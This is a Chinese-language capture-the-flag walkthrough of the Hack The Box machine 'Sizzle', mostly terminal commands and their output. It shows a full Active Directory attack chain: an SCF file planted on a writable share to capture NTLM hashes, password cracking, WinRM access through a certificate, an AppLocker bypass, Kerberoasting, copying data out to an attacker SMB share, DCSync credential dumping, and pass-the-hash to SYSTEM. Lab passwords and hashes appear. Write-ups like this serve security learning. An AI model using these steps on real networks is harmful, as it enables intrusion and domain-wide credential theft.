端口扫描

┌──(mikannse㉿kali)-[~/HTB/sizzle]
└─$ sudo nmap --min-rate=10000 -p- 10.10.10.103                                         
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-21 11:52 CST
Nmap scan report for 10.10.10.103
Host is up (0.16s latency).
Not shown: 65507 filtered tcp ports (no-response)
PORT      STATE SERVICE
21/tcp    open  ftp
53/tcp    open  domain
80/tcp    open  http
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
443/tcp   open  https
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
5986/tcp  open  wsmans
9389/tcp  open  adws
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49667/tcp open  unknown
49670/tcp open  unknown
49676/tcp open  unknown
49692/tcp open  unknown
49693/tcp open  unknown
49695/tcp open  unknown
49698/tcp open  unknown
49713/tcp open  unknown
49728/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 27.73 seconds
┌──(mikannse㉿kali)-[~/HTB/sizzle]
└─$ sudo nmap -sT -sC -sV -O -p21,53,80,88,135,139,389,443,445,464,593,636,3268,3269,5985,9389 10.10.10.103
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-21 11:56 CST
Nmap scan report for 10.10.10.103
Host is up (0.075s latency).

PORT     STATE    SERVICE       VERSION
21/tcp   open     ftp           Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|_  SYST: Windows_NT
53/tcp   open     domain        Simple DNS Plus
80/tcp   open     http          Microsoft IIS httpd 10.0
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
88/tcp   filtered kerberos-sec
135/tcp  open     msrpc         Microsoft Windows RPC
139/tcp  open     netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open     ldap          Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after:  2020-07-02T17:58:55
|_ssl-date: 2024-09-21T03:47:27+00:00; -10m48s from scanner time.
443/tcp  open     ssl/http      Microsoft IIS httpd 10.0
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after:  2020-07-02T17:58:55
| tls-alpn: 
|   h2
|_  http/1.1
|_ssl-date: 2024-09-21T03:47:27+00:00; -10m48s from scanner time.
445/tcp  open     microsoft-ds?
464/tcp  open     kpasswd5?
593/tcp  open     ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open     ssl/ldap
|_ssl-date: 2024-09-21T03:47:27+00:00; -10m48s from scanner time.
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after:  2020-07-02T17:58:55
3268/tcp open     ldap          Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after:  2020-07-02T17:58:55
|_ssl-date: 2024-09-21T03:47:27+00:00; -10m48s from scanner time.
3269/tcp open     ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after:  2020-07-02T17:58:55
|_ssl-date: 2024-09-21T03:47:27+00:00; -10m48s from scanner time.
5985/tcp open     http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open     mc-nmf        .NET Message Framing
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2016 (89%)
OS CPE: cpe:/o:microsoft:windows_server_2016
Aggressive OS guesses: Microsoft Windows Server 2016 (89%)
No exact OS matches for host (test conditions non-ideal).
Service Info: Host: SIZZLE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -10m47s, deviation: 1s, median: -10m48s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2024-09-21T03:46:15
|_  start_date: 2024-09-21T03:38:30

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 142.29 seconds

Enum

┌──(mikannse㉿kali)-[~/HTB/sizzle]
└─$ dig any htb.local @10.10.10.103

; <<>> DiG 9.20.1-1-Debian <<>> any htb.local @10.10.10.103
;; global options: +cmd
;; Got answer:
;; WARNING: .local is reserved for Multicast DNS
;; You are currently testing what happens when an mDNS query is leaked to DNS
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 2718
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 4, AUTHORITY: 0, ADDITIONAL: 2

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
; COOKIE: 9c09357f9974279c (echoed)
;; QUESTION SECTION:
;htb.local.                     IN      ANY

;; ANSWER SECTION:
htb.local.              600     IN      A       10.10.10.103
htb.local.              3600    IN      NS      sizzle.htb.local.
htb.local.              3600    IN      SOA     sizzle.htb.local. hostmaster.htb.local. 193 900 600 86400 3600
htb.local.              600     IN      AAAA    dead:beef::ad75:a077:89c9:f15d

;; ADDITIONAL SECTION:
sizzle.htb.local.       3600    IN      A       10.10.10.103

;; Query time: 71 msec
;; SERVER: 10.10.10.103#53(10.10.10.103) (TCP)
;; WHEN: Sat Sep 21 12:02:33 CST 2024
;; MSG SIZE  rcvd: 178

添加htb.local,sizzle.htb.local,hostmaster.htb.local

ftp能够匿名登录,但是里面没有内容

┌──(mikannse㉿kali)-[~/HTB/sizzle]
└─$ smbmap -H 10.10.10.103 -u guest    
<SNIP>                                                                                                                                                                             
[+] IP: 10.10.10.103:445        Name: htb.local                 Status: Authenticated
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        CertEnroll                                              NO ACCESS       Active Directory Certificate Services share
        Department Shares                                       READ ONLY
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                NO ACCESS       Logon server share 
        Operations                                              NO ACCESS
        SYSVOL                                                  NO ACCESS       Logon server share

能够读取Department Shares,应该是个部门共享,里面有个users目录,先将用户名保存下来,除此之外没有别的内容,访问了web,只有一张烤肉的gif,目录枚举也无果

只好继续回到smb共享,查看Department Shares中,根据房间提示,是否有匿名用户可写的目录,先将整个目录挂载到本地

┌──(mikannse㉿kali)-[~/HTB/sizzle]
└─$ sudo mount -t cifs "//10.10.10.103/Department Shares" /mnt/share
[sudo] password for mikannse: 
Password for root@//10.10.10.103/Department Shares:
┌──(mikannse㉿kali)-[~/HTB/sizzle]
└─$ ls /mnt/share
 Accounting   CEO_protected   HR        Infrastructure   Marketing   Security   ZZ_ARCHIVE
 Audit        Devops          IT        Legal           'R&D'        Tax
 Banking      Finance         Infosec  'M&A'             Sales       Users

写一个bash脚本用于探测可写目录

list=$(find /mnt/share -type d)
for d in $list
do
touch $d/x 2>/dev/null
if [ $? -eq 0 ]
then
echo $d " is writable"
fi
done
┌──(mikannse㉿kali)-[~/HTB/sizzle]
└─$ sudo ./scan.sh                                            
/mnt/share/Users/Public  is writable
/mnt/share/ZZ_ARCHIVE  is writable

Getshell

使用ntlm-theft,生成文件来上传

┌──(mikannse㉿kali)-[~/tools/domain/ntlm_theft]
└─$ python ntlm_theft.py -g all -s 10.10.14.15 -f hacker
┌──(mikannse㉿kali)-[~/tools/domain/ntlm_theft/hacker]
└─$ sudo cp ./hacker.scf /mnt/share/Users/Public/
[sudo] password for mikannse: 
                                                                                                     
┌──(mikannse㉿kali)-[~/tools/domain/ntlm_theft/hacker]
└─$ sudo cp ./hacker.scf /mnt/share/ZZ_ARCHIVE
┌──(mikannse㉿kali)-[~/HTB/sizzle]
└─$ smbserver.py share . -smb2support                         
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.10.103,51966)
[*] AUTHENTICATE_MESSAGE (HTB\amanda,SIZZLE)
[*] User SIZZLE\amanda authenticated successfully
[*] amanda::HTB:aaaaaaaaaaaaaaaa:b386a4ad45aabe55eac3ab637bc070c1:010100000000000080d90e3f010cdb01ea01259ac0aef0be00000000010010005a004a004d007600560050006a006c00030010005a004a004d007600560050006a006c00020010006a005200630077007a006e0074007900040010006a005200630077007a006e00740079000700080080d90e3f010cdb010600040002000000080030003000000000000000010000000020000013a18ef53140e405b57b69236feed65c46d3459d71ac3d0cb4bc9f5bc6f403840a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e0031003500000000000000000000000000
┌──(mikannse㉿kali)-[~/HTB/sizzle]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Ashare1972       (amanda)     
1g 0:00:00:04 DONE (2024-09-21 16:36) 0.2173g/s 2482Kp/s 2482Kc/s 2482KC/s Ashia12..Arief&Siti
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.

得到:amanda:Ashare1972,但是不能用于winrm登录,返回:

Error: An error of type WinRM::WinRMHTTPTransportError happened, message is Unable to parse authorization header. Headers: {"Server"=>"Microsoft-HTTPAPI/2.0", "Date"=>"Sat, 21 Sep 2024 08:28:03 GMT", "Connection"=>"close", "Content-Length"=>"0"}                                                          
Body:  (401).                                                                                        
                                        
Error: Exiting with code 1

无法解析验证头,似乎是因为证书的问题

回到web,通过扫描目录

┌──(mikannse㉿kali)-[~/HTB/sizzle]
└─$ gobuster dir -u https://10.10.10.103/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/IIS.fuzz.txt -k
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     https://10.10.10.103/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/SecLists/Discovery/Web-Content/IIS.fuzz.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/aspnet_client/       (Status: 403) [Size: 1233]
/certsrv/             (Status: 401) [Size: 1293]
/certenroll/          (Status: 403) [Size: 1233]
/certsrv/mscep/mscep.dll (Status: 401) [Size: 1293]
/certsrv/mscep_admin  (Status: 401) [Size: 1293]
/images/              (Status: 403) [Size: 1233]
Progress: 102 / 212 (48.11%)[ERROR] parse "https://10.10.10.103/%NETHOOD%/": invalid URL escape "%NE"
/<script>alert('XSS')</script>.aspx (Status: 400) [Size: 3420]
/~/<script>alert('XSS')</script>.aspx (Status: 400) [Size: 3420]
Progress: 211 / 212 (99.53%)
===============================================================
Finished
===============================================================

https://10.10.10.103/certsrv 能够利用amanda的凭证登录,certsrv是允许用户请求证书的页面,可以生成证书

首先需要在本地先生成私钥和证书签名请求来申请证书

┌──(mikannse㉿kali)-[~/HTB/sizzle]
└─$ openssl genrsa -des3 -out amanda.key 2048     
Enter PEM pass phrase:
Verifying - Enter PEM pass phrase:
┌──(mikannse㉿kali)-[~/HTB/sizzle]
└─$ openssl req -new -key amanda.key -out amanda.csr
Enter pass phrase for amanda.key:
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:
State or Province Name (full name) [Some-State]:
Locality Name (eg, city) []:
Organization Name (eg, company) [Internet Widgits Pty Ltd]:
Organizational Unit Name (eg, section) []:
Common Name (e.g. server FQDN or YOUR name) []:
Email Address []:

Please enter the following 'extra' attributes
to be sent with your certificate request
A challenge password []:
An optional company name []:

在网页中点击请求证书,高级证书,提交.csr的内容(一串base64编码),然后以base64编码形式下载证书

利用私钥和公钥证书,并且开启SSL认证,输入生成私钥的密码之后,登陆成功!

┌──(mikannse㉿kali)-[~/HTB/sizzle]
└─$ evil-winrm -i 10.10.10.103 -u 'amanda' -p 'Ashare1972' -c ./certnew.cer -k ./amanda.key -S
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine                                                                   
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion                                                                                     
                                        
Warning: SSL enabled
                                        
Info: Establishing connection to remote endpoint
Enter PEM pass phrase:
*Evil-WinRM* PS C:\Users\amanda\Documents> 
*Evil-WinRM* PS C:\Users\amanda\desktop> netstat -ap tcp

Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:21             sizzle:0               LISTENING
  TCP    0.0.0.0:80             sizzle:0               LISTENING
  TCP    0.0.0.0:88             sizzle:0               LISTENING
  TCP    0.0.0.0:135            sizzle:0               LISTENING
<SNIP>

Kerberoasting

发现还开启着88kerberos,可以尝试Kerberoasting攻击,可以使用rubeus,但是运行的时候被阻拦了,应该是applocker

根据 https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/Generic-AppLockerbypasses.md 尝试

C:\Windows\System32\spool\drivers\color目录可以执行!

*Evil-WinRM* PS C:\Windows\System32\spool\drivers\color> .\rb.exe kerberoast /creduser:htb.local\amanda /credpassword:Ashare1972
<SNIP>
[*] Total kerberoastable users : 1


[*] SamAccountName         : mrlky
[*] DistinguishedName      : CN=mrlky,CN=Users,DC=HTB,DC=LOCAL
[*] ServicePrincipalName   : http/sizzle
[*] PwdLastSet             : 7/10/2018 2:08:09 PM
[*] Supported ETypes       : RC4_HMAC_DEFAULT
[*] Hash                   : $krb5tgs$23$*mrlky$HTB.LOCAL$http/sizzle@HTB.LOCAL*$9000D99EB81039155964C86C7A92
                             B454$468C141F8792AC6CF71711CA20033988A1C3BC68F17F0C464FE1060D62CD60EC40ACD365C8E
                             498CF040FBD247229ADEA6942870BB2FE83C28C6785E8D38EDE86969F7A84325A03DD4636D0C9BDC
                             8B6E4ADE1DEDDAA7B94A142FC5CDF79BEFD3A7CCD9855E3107311AFB85ED388BDE5FE823DC30A179
<SNIP>

复制下来并处理一下空行

┌──(mikannse㉿kali)-[~/tools/ByPass]
└─$ cat hash |tr -d " ","\r\n">hash1
┌──(mikannse㉿kali)-[~/tools/ByPass]
└─$ hashcat -m 13100 -a 0 hash1 /usr/share/wordlists/rockyou.txt

得到:mrlky:Football#7

再次重复一遍之前的流程为mrlky用户申请一个证书,竟然没有退出登录的按钮,于是选择了清除所有cookie再登录

DCSync

用sharphound搜寻一下

*Evil-WinRM* PS C:\Windows\System32\spool\drivers\color> .\sp.exe --CollectionMethods All
2024-09-21T07:54:03.0827928-04:00|INFORMATION|This version of SharpHound is compatible with the 4.3.1 Release of BloodHound
2024-09-21T07:54:03.1921624-04:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2024-09-21T07:54:03.2077875-04:00|INFORMATION|Initializing SharpHound at 7:54 AM on 9/21/2024
2024-09-21T07:54:03.3171661-04:00|INFORMATION|[CommonLib LDAPUtils]Found usable Domain Controller for HTB.LOCAL : sizzle.HTB.LOCAL
2024-09-21T07:54:03.3327929-04:00|INFORMATION|Flags: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2024-09-21T07:54:03.4421660-04:00|INFORMATION|Beginning LDAP search for HTB.LOCAL
2024-09-21T07:54:03.4734300-04:00|INFORMATION|Producer has finished, closing LDAP channel
2024-09-21T07:54:03.4734300-04:00|INFORMATION|LDAP channel closed, waiting for consumers
2024-09-21T07:54:33.7391237-04:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 34 MB RAM
Enter PEM pass phrase:
2024-09-21T07:55:00.5360312-04:00|INFORMATION|Consumers finished, closing output channel
Closing writers
2024-09-21T07:55:00.5516601-04:00|INFORMATION|Output channel closed, waiting for output task to complete
2024-09-21T07:55:00.6454104-04:00|INFORMATION|Status: 94 objects finished (+94 1.649123)/s -- Using 42 MB RAM
2024-09-21T07:55:00.6454104-04:00|INFORMATION|Enumeration finished in 00:00:57.2129807
2024-09-21T07:55:00.7235314-04:00|INFORMATION|Saving cache with stats: 54 ID to type mappings.
 53 name to SID mappings.
 0 machine sid mappings.
 2 sid to domain mappings.
 0 global catalog mappings.
2024-09-21T07:55:00.7391572-04:00|INFORMATION|SharpHound Enumeration Completed at 7:55 AM on 9/21/2024! Happy Graphing!
Enter PEM pass phrase:

用smb运回来

┌──(mikannse㉿kali)-[~/HTB/sizzle]
└─$ smbserver.py share . -smb2support -username kali -password kali 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
*Evil-WinRM* PS C:\Windows\System32\spool\drivers\color> net use \\10.10.14.15\share /u:kali kali
Enter PEM pass phrase:
The command completed successfully.

*Evil-WinRM* PS C:\Windows\System32\spool\drivers\color> copy 20240921075447_BloodHound.zip \\10.10.14.15\share

导入bloodhound之后查看mrlky用户,在outbound object中发现有一条路径是dcsync,简单来说就是允许模拟另外一个域来复制这个域的信息

https://book.hacktricks.xyz/v/cn/windows-hardening/active-directory-methodology/dcsync

利用secretsdump能够远程进行

┌──(mikannse㉿kali)-[~/HTB/sizzle]
└─$ secretsdump.py -just-dc mrlky:Football#7@10.10.10.103
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:f6b7160bfc91823792e0ac3a162c9267:::
<SNIP>
┌──(mikannse㉿kali)-[~/HTB/sizzle]
└─$ psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:f6b7160bfc91823792e0ac3a162c9267 htb.lcoal/administrator@10.10.10.103
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Requesting shares on 10.10.10.103.....
[*] Found writable share ADMIN$
[*] Uploading file YdQqMrRs.exe
[*] Opening SVCManager on 10.10.10.103.....
[*] Creating service CATK on 10.10.10.103.....
[*] Starting service CATK.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

碎碎念

也是收获蛮大的房间,了解了DCsync